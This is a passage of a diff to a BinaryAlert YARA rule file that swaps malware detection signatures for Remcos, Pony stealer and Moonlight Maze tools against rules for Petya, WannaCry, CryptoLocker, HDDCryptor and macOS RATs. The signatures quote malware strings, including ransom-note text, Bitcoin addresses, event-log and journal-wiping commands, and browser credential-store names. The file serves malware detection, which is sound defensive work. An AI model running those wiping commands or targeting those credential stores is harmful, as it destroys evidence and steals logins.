 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "65fe29075294dfad06f4cca631d5d2f1283c439e9a5913f503fe6e4bb1f5f70a"
+		hash = "bc62b557d48f3501c383f25d014f22df"
+		logic_hash = "43b3b8be5a23b57f6c671abd8491cdc51af1cf3a3fe8a7be308150697cdb92ea"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		md5_1 = "d98796dcda1443a37b124dbdc041fe3b"
-		md5_2 = "73a518f0a73ab77033121d4191172820"
+		tags = ""
 
 	strings:
-		$a1 = "Hiding complit...n"
-		$a2 = "usage: %s <username> <fixthings> [hostname]"
-		$a3 = "ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmp"
+		$s1 = "38oDr5.vbs" fullword ascii wide
+		$s2 = "8ivq.dll" fullword ascii wide
+		$s3 = "jmsctls_progress32" fullword ascii wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( any of them )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Remcos_Rat
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_3
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
-		author = "@mimeframe"
-		id = "420c135f-3150-5cb9-9c1c-105cd260d713"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
+		author = "@fusionrace"
+		id = "cbf06e62-abe8-54af-b4f4-624ba9233e4b"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://breaking-security.net/remcos/remcos-changelog/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_remcos_rat.yara#L1-L20"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "c8dafe143fe1d81ae6a3c0cd4724b272"
-		logic_hash = "ec1ec69f628111235bafad8177482256ed571c064a81f01b6ec2643dccc926ad"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "4f21b394eb2dd0ebf416b018f438934fdc89cb896701d95b593477fc19abfe48"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[Following text has been pasted from clipboard:]" wide ascii
-		$a2 = "[Chrome StoredLogins found, cleared!]" wide ascii
-		$a3 = "[Firefox StoredLogins cleared!]" wide ascii
-		$b1 = "getclipboard" wide ascii
-		$b2 = "stopmiccapture" wide ascii
-		$b3 = "downloadfromurltofile" wide ascii
-		$b4 = "getcamsingleframe" wide ascii
-		$c1 = "Breaking-Security.Net" wide ascii
-		$c2 = "REMCOS v" wide ascii
+		$s1 = "wevtutil cl Setup & wevtutil cl System" fullword wide
+		$s2 = "fsutil usn deletejournal /D %c:" fullword wide
 
 	condition:
-		any of ( $a* ) or 3 of ( $b* ) or all of ( $c* )
+		any of them
 }
-rule BINARYALERT_Ccleaner_Backdoor
+rule BINARYALERT_Ransomware_Windows_Cryptolocker
 {
 	meta:
-		description = "Ccleaner 5.33 backdoor with a possible APT17/Group72 connection."
+		description = "The CryptoLocker malware propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts files stored on local and mounted network drives"
 		author = "@fusionrace"
-		id = "769e4fcb-9638-5a5b-8b73-a1cda3bc286a"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_ccleaner_backdoor.yara#L1-L15"
+		id = "be205f4b-d078-5437-bacc-203c816db2fa"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://www.secureworks.com/research/cryptolocker-ransomware"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cryptolocker.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "ce3fc54d58e337ab17e6f1ba7745c593210483c02ed3969059a8fe6682d87218"
+		hash = "012d9088558072bc3103ab5da39ddd54"
+		logic_hash = "317cbc01b4c329befeb5b25478f7827298a26d21b872ae232c519febd9c547fc"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "d488e4b61c233293bec2ee09553d3a2f"
-		md5_2 = "b95911a69e49544f9ecc427478eb952f"
-		md5_3 = "063b58879c8197b06d619c3be90506ec"
-		md5_4 = "7690e414e130acf7c962774c05283142"
 
 	strings:
-		$s1 = "s:\\workspace\\ccleaner\\branches\\v5.33" fullword ascii wide
+		$u0 = "Paysafecard is an electronic payment method for predominantly online shopping" fullword ascii wide
+		$u1 = "bb to select the method of payment and the currency." fullword ascii wide
+		$u2 = "Where can I purchase a MoneyPak?" fullword ascii wide
+		$u3 = "Ukash is electronic cash and e-commerce brand." fullword ascii wide
+		$u4 = "You have to send below specified amount to Bitcoin address" fullword ascii wide
+		$u5 = "cashU is a prepaid online" fullword ascii wide
+		$u6 = "Your important files \\b encryption" fullword ascii wide
+		$u7 = "Encryption was produced using a \\b unique\\b0  public key" fullword ascii wide
+		$u8 = "then be used to pay online, or loaded on to a prepaid card or eWallet." fullword ascii wide
+		$u9 = "Arabic online gamers and e-commerce buyers." fullword ascii wide
 
 	condition:
-		$s1
+		2 of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_IRIX_Exploit_GEN : FILE
+rule BINARYALERT_Ransomware_Windows_Powerware_Locky
 {
 	meta:
-		description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers"
-		author = "Kaspersky Lab"
-		id = "4f9ab7b0-4fb9-5311-ae23-01d0a9e2e104"
+		description = "PowerWare Ransomware"
+		author = "@fusionrace"
+		id = "8a1a56af-7a9d-54ed-90b9-daf33735ee1e"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.exploit-db.com/exploits/19274/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_IRIX_exploit_GEN.yara#L3-L20"
+		reference = "https://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "9d55d780c84f2aa4e64c19842b2055ef4bf7c8844ebe622c3942445b06ab8344"
+		hash = "3433a4da9d8794709630eb06afd2b8c1"
+		logic_hash = "64de34755f706a9fd4c876c473eed4f8922a4450c7ef135b0ab5e49c67363baf"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		md5_1 = "008ea82f31f585622353bd47fa1d84be"
-		md5_2 = "a26bad2b79075f454c83203fa00ed50c"
-		md5_3 = "f67fc6e90f05ba13f207c7fdaa8c2cab"
-		md5_4 = "5937db3896cdd8b0beb3df44e509e136"
-		md5_5 = "f4ed5170dcea7e5ba62537d84392b280"
+		quality = 78
+		tags = ""
 
 	strings:
-		$a1 = "stack = 0x%x, targ_addr = 0x%x"
-		$a2 = "execl failed"
+		$s0 = "ScriptRunner.dll" fullword ascii wide
+		$s1 = "ScriptRunner.pdb" fullword ascii wide
+		$s2 = "fixed.ps1" fullword ascii wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( all of them )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Wipe : FILE
+rule BINARYALERT_Ransomware_Windows_Lazarus_Wannacry : FILE
 {
 	meta:
-		description = "Rule to detect log cleaner based on wipe.c"
-		author = "Kaspersky Lab"
-		id = "35060c3d-b805-54a6-a241-eb6e99168fa8"
+		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
+		author = "Costin G. Raiu, Kaspersky Lab"
+		id = "6335bd03-0625-5856-891c-9a5decd7e00f"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://www.afn.org/~afn28925/wipe.c"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_wipe.yara#L3-L18"
+		reference = "https://twitter.com/neelmehta/status/864164081116225536"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_lazarus_wannacry.yara#L3-L32"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "e69efc504934551c6a77b525d5343241"
-		logic_hash = "0241d1ca9f5a4d066f7ed2e80bc18ebae3723c6a2364422e31909e8f0e576675"
+		logic_hash = "dddff5f74bf3f11baf1d3853d6cb5e5b1e0c5e75445c421d4d5145f7a496fc4b"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		md5_1 = "9c7c7149387a1c79679a87dd1ba755bc"
+		md5_2 = "ac21c8ad899727137c4b94458d7aa8d8"
 
 	strings:
-		$a1 = "ERROR: Unlinking tmp WTMP file."
-		$a2 = "USAGE: wipe [ u|w|l|a ] ...options..."
-		$a3 = "Erase acct entries on tty :   wipe a [username] [tty]"
-		$a4 = "Alter lastlog entry       :   wipe l [username] [tty] [time] [host]"
+		$a1 = {
+        51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
+        04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
+        46 56 E8
+        }
+		$a2 = {
+        03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
+        10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
+        30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
+        38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
+        44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
+        68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
+        FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
+        08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
+        10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
+        2B C0 2C C0 FF FE
+        }
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( 2 of them )
+		(( uint16( 0 ) == 0x5A4D ) ) and all of them
 }
-rule BINARYALERT_Malware_Windows_Pony_Stealer
+rule BINARYALERT_Ransomware_Windows_Hydracrypt
 {
 	meta:
-		description = "Pony stealer malware"
-		author = "@mimeframe"
-		id = "77af81cb-36c7-56a7-bd89-14d79628e5c4"
+		description = "HydraCrypt encrypts a victim’s files and appends the filenames with the extension “hydracrypt_ID_*"
+		author = "@fusionrace"
+		id = "9ebf205e-b6a9-55a3-b0c3-9b088790dc9a"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://www.knowbe4.com/pony-stealer"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_pony_stealer.yara#L1-L21"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/hydracrypt-variant-of-ransomware-distributed-by-angler-exploit-kit/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "5e52ce394c3be2a685dbb8f435e2f64f"
-		logic_hash = "4d4e28e0d4d97412a9129a4abfadc130a464a2ababf46ca8f366a2a30b262261"
+		hash = "08b304d01220f9de63244b4666621bba"
+		logic_hash = "3ecb3e6c269f4145e60b0e7bb0e896120ceb2db2123f847bf4bdf5d4490467d5"
 		score = 75
-		quality = 50
+		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "signons.sqlite" nocase wide ascii
-		$a2 = "signons.txt" nocase wide ascii
-		$a3 = "signons2.txt" nocase wide ascii
-		$a4 = "signons3.txt" nocase wide ascii
-		$a5 = "WininetCacheCredentials" nocase wide ascii
-		$a6 = "moz_logins" nocase wide ascii
-		$a7 = "encryptedPassword" nocase wide ascii
-		$a8 = "FlashFXP" nocase wide ascii
-		$a9 = "BulletProof" nocase wide ascii
-		$a10 = "CuteFTP" nocase wide ascii
+		$u0 = "oTraining" fullword ascii wide
+		$u1 = "Stop Training" fullword ascii wide
+		$u2 = "Play \"sound.wav\"" fullword ascii wide
+		$u3 = "&Start Recording" fullword ascii wide
+		$u4 = "7About record" fullword ascii wide
 
 	condition:
-		all of ( $a* )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Cle_Tool
+rule BINARYALERT_Ransomware_Windows_Hddcryptora
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
-		author = "Kaspersky Lab"
-		id = "d875a3cf-cad1-509f-bb9f-27f0a3a9b79d"
+		description = "The HDDCryptor ransomware encrypts local harddisks as well as resources in network shares via Server Message Block (SMB)"
+		author = "@fusionrace"
+		id = "56d7f1f5-811d-58c9-9e1d-d2f48c01e167"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_cle_tool.yara#L1-L17"
+		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_HDDCryptorA.yara#L1-L23"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "647d7b711f7b4434145ea30d0ef207b0"
-		logic_hash = "8f75df1240b9e5e905492106265a7e1342db4140d715529933af4ba5c8ec6331"
+		hash = "498bdcfb93d13fecaf92e96f77063abf"
+		logic_hash = "24c113be31c3df7b544a5789bf055f77471d450c07f0a6729a715e2a82b4d1f0"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = ""
 
 	strings:
-		$a1 = "./a filename template_file" ascii wide
-		$a2 = "May be %s is empty?" ascii wide
-		$a3 = "template string = |%s|" ascii wide
-		$a4 = "No blocks !!!"
-		$a5 = "No data in this block !!!!!!" ascii wide
-		$a6 = "No good line"
+		$u1 = "You are Hacked" fullword ascii wide
+		$u2 = "Your H.D.D Encrypted , Contact Us For Decryption Key" nocase ascii wide
+		$u3 = "start hard drive encryption..." ascii wide
+		$u4 = "Your hard drive is securely encrypted" ascii wide
+		$g1 = "Wipe All Passwords?" ascii wide
+		$g2 = "SYSTEM\\CurrentControlSet\\Services\\dcrypt\\config" ascii wide
+		$g3 = "DiskCryptor" ascii wide
+		$g4 = "dcinst.exe" fullword ascii wide
+		$g5 = "dcrypt.exe" fullword ascii wide
+		$g6 = "you can only use AES to encrypt the boot partition!" ascii wide
 
 	condition:
-		3 of ( $a* )
+		2 of ( $u* ) or 4 of ( $g* )
 }
-rule BINARYALERT_Malware_Windows_Winnti_Loadperf_Dll_Loader
+rule BINARYALERT_Ransomware_Windows_Wannacry
 {
 	meta:
-		description = "Winnti APT group; gzwrite64 imported from loadoerf.ini"
-		author = "@mimeframe"
-		id = "41444dd5-41b9-550c-9124-bc7f41326baa"
+		description = "wannacry ransomware for windows"
+		author = "@fusionrace"
+		id = "0269b6f4-a47d-5683-aaaa-2141ca7f04dc"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_winnti_loadperf_dll_loader.yara#L1-L13"
+		reference = "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_wannacry.yara#L1-L23"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "879ce99e253e598a3c156258a9e81457"
-		logic_hash = "b1035174edfff2e142026f3482fc53407af59f5215a6030c0d2a85501152c3db"
+		hash = "4fef5e34143e646dbf9907c4374276f5"
+		logic_hash = "c01f460c0f5e39cde5f553c966553fe693e5203cb020b8f571eac6fc193fa91b"
 		score = 75
-		quality = 80
+		quality = 50
 		tags = ""
 
 	strings:
-		$s1 = "loadoerf.ini" fullword ascii wide
-		$s2 = "gzwrite64" fullword ascii wide
+		$a1 = "msg/m_chinese" wide ascii
+		$a2 = ".wnry" wide ascii
+		$a3 = "attrib +h" wide ascii
+		$b1 = "WNcry@2ol7" wide ascii
+		$b2 = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" wide ascii
+		$b3 = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" wide ascii
+		$b4 = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" wide ascii
+		$b5 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" wide ascii
 
 	condition:
-		all of ( $s* )
+		all of ( $a* ) or any of ( $b* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Custom_Sniffer
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_1
 {
 	meta:
-		description = "Rule to detect Moonlight Maze sniffer tools"
-		author = "Kaspersky Lab"
-		id = "a9f005e0-8d73-58ff-b010-d3ce08ffdb64"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
+		author = "@fusionrace"
+		id = "bf56c0e4-585c-509b-a182-a93c74be7524"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_custom_sniffer.yara#L1-L20"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara#L1-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "466be027f567fe0afc88c82d94e4e0171b4b7d8f38d27a4c4a18cec4ca2b8b2f"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "3733834ee2271a483739b09c4222d222aa4899cab48fd8fc558bdbd9a66bf2d6"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "7b86f40e861705d59f5206c482e1f2a5"
-		md5_2 = "927426b558888ad680829bd34b0ad0e7"
 
 	strings:
-		$a1 = "/var/tmp/gogo" fullword
-		$a2 = "myfilename= |%s|" fullword
-		$a3 = "mypid,mygid=" fullword
-		$a4 = "mypid=|%d| mygid=|%d|" fullword
-		$a5 = "/var/tmp/task" fullword
-		$a6 = "mydevname= |%s|" fullword
+		$s1 = "Ooops, your important files are encrypted." fullword ascii wide
+		$s2 = "Send your Bitcoin wallet ID and personal installation key to e-mail" fullword ascii wide
+		$s3 = "wowsmith123456@posteo.net. Your personal installation key:" fullword ascii wide
+		$s4 = "Send $300 worth of Bitcoin to following address:" fullword ascii wide
+		$s5 = "have been encrypted.  Perhaps you are busy looking for a way to recover your" fullword ascii wide
+		$s6 = "need to do is submit the payment and purchase the decryption key." fullword ascii wide
 
 	condition:
-		any of ( $a* )
+		any of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki
+rule BINARYALERT_Malware_Macos_Proton_Rat_Generic
 {
 	meta:
-		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
-		author = "Kaspersky Lab"
-		id = "06eeb6a4-540f-51eb-86f9-4ab49543f645"
+		description = "No description has been set in the source file - BinaryAlert"
+		author = "@mimeframe"
+		id = "75cfaaff-e8d7-5cd4-953b-7d2011139725"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki.yara#L1-L27"
+		reference = "https://objective-see.com/blog/blog_0x1D.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_proton_rat_generic.yara#L3-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "9a403695ded6ff3626820ba0d4abde7ccd6f3fa6bfd8aa4ceaf0cc009d34c97f"
+		hash = "6a2d0c8b20efc3fa283176a4bc76d6fd"
+		logic_hash = "b7d8660320564cba1d8e2d53d1fdc75509140c7e87a572b27931c62201df2d22"
 		score = 75
-		quality = 80
+		quality = 64
 		tags = ""
-		md5_1 = "14cce7e641d308c3a177a8abb5457019"
-		md5_2 = "a3164d2bbc45fb1eef5fde7eb8b245ea"
-		md5_3 = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
-		md5_4 = "1980958afffb6a9d5a6c73fc1e2795c2"
-		md5_5 = "e59f92aadb6505f29a9f368ab803082e"
 
 	strings:
-		$a1 = "Write file Ok..." ascii wide
-		$a2 = "ERROR: Can not open socket...." ascii wide
-		$a3 = "Error in parametrs:" ascii wide
-		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
-		$a5 = "ERROR: Not connect..." ascii wide
-		$a6 = "Connect successful...." ascii wide
-		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
-		$a8 = "clnt <%d> rqstd swap" ascii wide
-		$a9 = "cld nt sgnl prcs grp" ascii wide
-		$a10 = "cld nt sgnl prnt" ascii wide
-		$a11 = "ork error" ascii fullword
+		$a1 = "SRWebSocket" nocase wide ascii
+		$a2 = "SocketRocket" nocase wide ascii
+		$b1 = "SSH tunnel not launched" nocase wide ascii
+		$b2 = "SSH tunnel still running" nocase wide ascii
+		$b3 = "SSH tunnel already launched" nocase wide ascii
+		$b4 = "Entering interactive session." nocase wide ascii
 
 	condition:
-		2 of ( $a* )
+		BINARYALERT_Macho_PRIVATE and any of ( $a* ) and any of ( $b* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki2Crypto
+rule BINARYALERT_Malware_Macos_Macspy : FILE
 {
 	meta:
-		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
-		author = "Costin Raiu, Kaspersky Lab"
-		id = "eb5fc283-4994-5db5-965d-e90caad95f4c"
+		description = "macSpy is a malware-as-a-service (MaaS) product advertised as the most sophisticated Mac spyware ever"
+		author = "AlienVault Labs"
+		id = "5f9a5ed5-a982-552c-a6df-326228eaf459"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki2crypto.yara#L1-L16"
+		reference = "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_macspy.yara#L3-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "abb2093844af1b854a9deed5baab3f4d67bd1189a4520f697aa69b7441d9488c"
+		hash = "6c03e4a9bcb9afaedb7451a33c214ae4"
+		logic_hash = "f04648860c9602e43516113000908008847dacfbe189d79e13737bcd034b68a0"
 		score = 75
 		quality = 80
-		tags = ""
-		md5_1 = "19fbd8cbfb12482e8020a887d6427315"
-		md5_2 = "ea06b213d5924de65407e8931b1e4326"
-		md5_3 = "14ecd5e6fc8e501037b54ca263896a11"
-		md5_4 = "e079ec947d3d4dacb21e993b760a65dc"
-		md5_5 = "edf900cebb70c6d1fcab0234062bfc28"
+		tags = "FILE"
 
 	strings:
-		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
+		$header0 = {cf fa ed fe}
+		$header1 = {ce fa ed fe}
+		$header2 = {ca fe ba be}
+		$c1 = { 76 31 09 00 76 32 09 00 76 33 09 00 69 31 09 00 69 32 09 00 69 33 09 00 69 34 09 00 66 31 09 00 66 32 09 00 66 33 09 00 66 34 09 00 74 63 3A 00 }
 
 	condition:
-		$modulus
+		($header0 at 0 or $header1 at 0 or $header2 at 0 ) and $c1
 }
-rule BINARYALERT_Malware_Windows_Apt_Red_Leaves_Generic
+rule BINARYALERT_Malware_Macos_Bella
 {
 	meta:
-		description = "Red Leaves malware, related to APT10"
-		author = "David Cannings"
-		id = "e0067b05-eb4a-52ec-8f35-9336a631f03b"
+		description = "Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS."
+		author = "@mimeframe"
+		id = "ca4ab508-8c97-5307-9aaf-db10cfd6ab35"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Red%20Leaves/Source/Red%20Leaves%20technical%20note%20v1.0.md"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_red_leaves_generic.yara#L1-L27"
+		reference = "https://github.com/Trietptm-on-Security/Bella"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_bella.yara#L1-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "81df89d6fa0b26cadd4e50ef5350f341"
-		logic_hash = "be03bba9d01e6584b5849514656fd7de866c478f343c0bc618d7dbeda1771696"
+		logic_hash = "b9c063b5ec8604958d3417ec8640da4314ebcf60ee55413a2f6fa8d138311614"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Feb 04 2015"
-		$a2 = "I can not start %s"
-		$a3 = "dwConnectPort" fullword
-		$a4 = "dwRemoteLanPort" fullword
-		$a5 = "strRemoteLanAddress" fullword
-		$a6 = "strLocalConnectIp" fullword
-		$a7 = "\\\\.\\pipe\\NamePipe_MoreWindows" wide
-		$a8 = "RedLeavesCMDSimulatorMutex" wide
-		$a9 = "(NT %d.%d Build %d)" wide
-		$a10 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide
-		$a11 = "red_autumnal_leaves_dllmain.dll" wide ascii
-		$a12 = "__data" wide
-		$a13 = "__serial" wide
-		$a14 = "__upt" wide
-		$a15 = "__msgid" wide
+		$a1 = "Verified! [2FV Enabled] Account ->" wide ascii
+		$a2 = "There is no root shell to perform this command. See [rooter] manual entry." wide ascii
+		$a3 = "Attempt to escalate Bella to root through a variety of attack vectors." wide ascii
+		$a4 = "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." wide ascii
+		$b1 = "user_pass_phish" fullword wide ascii
+		$b2 = "bella_info" fullword wide ascii
+		$b3 = "get_root" fullword wide ascii
+		$c1 = "Please specify a bella server." wide ascii
+		$c2 = "What port should Bella connect on [Default is 4545]:" wide ascii
 
 	condition:
-		7 of ( $a* )
+		any of ( $a* ) or all of ( $b* ) or all of ( $c* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_De_Tool
+rule BINARYALERT_Malware_Macos_Marten4N6_Evilosx
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
-		author = "Kaspersky Lab"
-		id = "8b943c21-eac7-521d-8dc6-90d611aa4d92"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_de_tool.yara#L1-L16"
